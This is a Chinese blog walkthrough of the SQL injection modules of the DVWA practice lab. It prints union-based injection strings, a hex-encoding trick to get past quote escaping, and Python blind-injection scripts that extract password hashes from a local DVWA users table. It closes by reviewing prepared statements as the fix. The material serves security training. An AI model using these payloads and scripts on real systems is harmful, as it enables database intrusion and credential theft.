dvwa批量mysql注入脚本_【DVWA】SQL注入篇

最新推荐文章于 2022-11-21 20:54:02 发布
最新推荐文章于 2022-11-21 20:54:02 发布
阅读量119 收藏 1
点赞数
文章标签: dvwa批量mysql注入脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33016287/article/details/114166992
版权

0x01 Low

SQL Injection

最简单的注入,没有任何过滤,常规语句注入即可:

1

1'

1'#

1' union select 1,2 #

0' union select database(),2 #

0' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa' #

0' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

0' union select group_concat(password),2 from users#

SQL Injection (Blind)

没有任何过滤,直接利用回显不同注入:

import requests

import urllib

#coding=uft-8

flag=""

cookie={'PHPSESSID': '设置为自己cookie中PHPSESSID值','security': 'low'}

for i in range(1,100):

for j in range(33,127):

#url = "http://127.0.0.1/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),%s,1))=%s%%23&Submit=Submit#" %(i,j)

#url = "http://127.0.0.1/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),%s,1))=%s%%23&Submit=Submit#" %(i,j)

#url = "http://127.0.0.1/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s%%23&Submit=Submit#" %(i,j)

url = "http://127.0.0.1/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select group_concat(password) from users),%s,1))=%s%%23&Submit=Submit#" %(i,j)

if j == 126:

exit(0)

r=requests.get(url,cookies=cookie)

if "User ID is MISSING from the database" not in r.content:

flag+=chr(j)

print flag

break

0x02 Medium

SQL Injection

首先是POST数据

测试注入:

1'%23

错误回显:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'#' at line 1

后台对传入的POST数据中的单引号和双引号前加入”,类似使用addslashes函数

同时#注释加与不加回显相同,应该是查询语句构造时应该是类似:

select column_1,column_2 from table_name where id = $_POST["id"]

不需要注释后面语句(没有后面)

不过这里存在数字型注入,同时字符中使用单引号可以使用十六进制绕过

剩下的和Low中的SQL Injection相同,只是遇到类似:

0 union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa'

利用十六进制绕过:

0 union select group_concat(table_name),2 from information_schema.tables where table_schema=0x64767761

SQL Injection (Blind)

和Medium的SQL Injection过滤规则一样

同样十六进制绕过过滤,脚本如下:

import requests

import urllib

#coding=uft-8

flag=""

url="http://127.0.0.1/vulnerabilities/sqli_blind/#"

cookie={'PHPSESSID': '设置为自己cookie中PHPSESSID值','security': 'medium'}

for i in range(1,100):

for j in range(33,127):

#key="1 and ascii(substr(database(),%s,1))=%s" %(i,j)

#key="1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x64767761),%s,1))=%s" %(i,j)

#key="1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),%s,1))=%s" %(i,j)

key="1 and ascii(substr((select group_concat(password) from users),%s,1))=%s" %(i,j)

data={'id':key,'Submit':'Submit'}

if j == 126:

exit(0)

r=requests.post(url,cookies=cookie,data=data)

if "User ID is MISSING from the database" not in r.content:

flag+=chr(j)

print flag

break

0x03 High

SQL Injection

一脸无奈,high比medium简单啊,和low一样(除了多弹了一个窗口):

1

1'

1'#

1' union select 1,2 #

0' union select database(),2 #

0' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa' #

0' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

0' union select group_concat(password),2 from users#

SQL Injection (Blind)

没有过滤,直接脚本,注意两个url之间的数据传输即可:

import requests

import urllib

#coding=uft-8

flag=""

url_1="http://127.0.0.1/vulnerabilities/sqli_blind/cookie-input.php"

url_2="http://127.0.0.1/vulnerabilities/sqli_blind/"

cookie={'id': '1','PHPSESSID': '设置为自己cookie中PHPSESSID值','security': 'high'}

for i in range(1,100):

for j in range(33,127):

ans=requests.Session()

#key="1' and ascii(substr(database(),%s,1))=%s#" %(i,j)

#key="1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),%s,1))=%s#" %(i,j)

#key="1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),%s,1))=%s#" %(i,j)

key="1' and ascii(substr((select group_concat(password) from users),%s,1))=%s#" %(i,j)

data={'id':key,'Submit':'Submit'}

if j == 126:

exit(0)

ans.post(url_1,cookies=cookie,data=data)

r=ans.get(url_2,cookies=cookie)

if "User ID is MISSING from the database" not in r.content:

flag+=chr(j)

print flag

break

其实这些都可以利用时间盲注,用if和sleep改一下脚本即可(注意根据具体情况设置timeout)

0x04 Impossible

SQL Injection && SQL Injection (Blind)

根据dvwa说明,impossible难度应该无法注入

SQL Injection 和 SQL Injection (Blind)的源码只有最后返回值不同

所以我们直接审计其中SQL Injection源码:

if( isset( $_GET[ 'Submit' ] ) ) {

// Check Anti-CSRF token

checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

// Get input

$id = $_GET[ 'id' ];

// Was a number entered?

if(is_numeric( $id )) {

// Check the database

$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );

$data->bindParam( ':id', $id, PDO::PARAM_INT );

$data->execute();

$row = $data->fetch();

// Make sure only 1 result is returned

if( $data->rowCount() == 1 ) {

// Get values

$first = $row[ 'first_name' ];

$last = $row[ 'last_name' ];

// Feedback for end user

$html .= "

ID: {$id}
First name: {$first}
Surname: {$last}
";

}

}

}

// Generate Anti-CSRF token

generateSessionToken();

?>

可以看到几点:

首先is_numeric判断id类型(如果只是is_numeric,我们可以利用十六进制绕过

此处:$data->rowCount() == 1判断返回数据,当只有一条数据返回时才会返回结果

关键在于:

$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );

$data->bindParam( ':id', $id, PDO::PARAM_INT );

$data->execute();

$row = $data->fetch();

这里利用PDO和bindParam对sql语句的代码和数据进行了分离,避免了注入的发生

【完结】

Jasmine松茸
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWASQL注入
m0_67393157的博客
07-28 476
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(1)
最新发布
2401_84253132的博客
04-29 946
这样的话估计不能使用Error注入。结论:字段为2。
DVWA-----SQL Injection(SQL手工注入
m0_65712192的博客
11-21 6072
DVWA-----SQL Injection(SQL手工注入
DVWA mysql 注入( low)
m0_65096687的博客
10-24 289
mysql注入的原理简单来说就是将页面的语句闭合掉,然后输入自己想执行的语句,语句会通过数据库进行查询,然后返回到页面low看传入的参数id是由 ' 包裹着,所以我们需要使用 ' 将第一个单引号给注释点,然后传入我们想要查询的语句,最后将第三个单引号给注释,来使数据库成功执行我们的查询语句。这个地方困扰了我好久输入' 会报错,因为没有闭合。所以判断出他是' 闭合的字符类型注入,我们只需要注释' 即可。正确的做法是。
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1875
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
DVWA-SQL注入
qq_60848021的博客
06-25 1165
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWA-------简单的SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA使用教程(Brute Force)(一)
aweiname2008的博客
03-19 341
DVWA使用教程(Brute Force)(一) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上传) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL Inj(SQL注入) 8.SQL B Inj(SQL盲注) 9....
DVWA SQL-injection 附python脚本
weixin_30617561的博客
01-05 317
SQL-Injection low等级 首先我们将dvwa等级调到low 如图 接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果 接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2 ...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
AWD攻防中读取flag批量脚本
09-05
AWD攻防中读取flag批量脚本,可能需要自行修改下
Mysql注入思路+编写脚本批量dump数据+getshell——SQL注入
CC__Faker的博客
06-17 948
目录前言0x00 sql注入测试0x0001 注点判断0x0002 回显字段判断0x0003 函数注入0x0004 数据获取0x01 数据下载0x0100 思路0x0101 获取页面0x0102 正则提取0x0103 获取一组数据0x0104 获取多组数据并写入0x0105 程序运行 前言 本次渗透测试的目的是为了验证SQL注入的危害和对联合查询注入流程的详细讲解,以及编写脚本批量下载。 环境:sqli-labs less-1,phpstduy 工具:蚁剑、pycharm 0x00 sql注入测试 0x
CVE-2022-21661 WordPress 5.8.2 SQL注入批量脚本
苏落is菜鸡的博客
01-18 3613
CVE-2022-21661 WordPress 5.8.2 SQL注入批量脚本
基于dvwa的自动化sql注入脚本
altersueyunsheng的博客
05-27 449
基于DVWA的自动化注入脚本 SQL注入 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功能; 增加了 多屏幕编辑 M
dvwa批量mysql注入脚本_SQL注入DVWA平台测试mysql注入
weixin_35980011的博客
02-04 95
1'and1=2unionselectversion(),database()--5、获得操作系统信息。1'and 1=2 union select 1,@@global.version_compile_os from mysql.user --6、测试连接数据库权限:1' and ord(mid(user(),1,1))=114 --7、查询mysql数据库,所有数据库名字:这里利...
dvwa全级别通关教程 jf_adm0616下载
07-28
例如,在初级级别,用户可以学习和了解一些基础的漏洞,如SQL注入、跨站脚本攻击(XSS)和命令注入。教程将引导用户通过漏洞利用工具或手动输入进行漏洞测试,并指导用户如何改进程序以避免这些漏洞。 随着用户逐渐...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值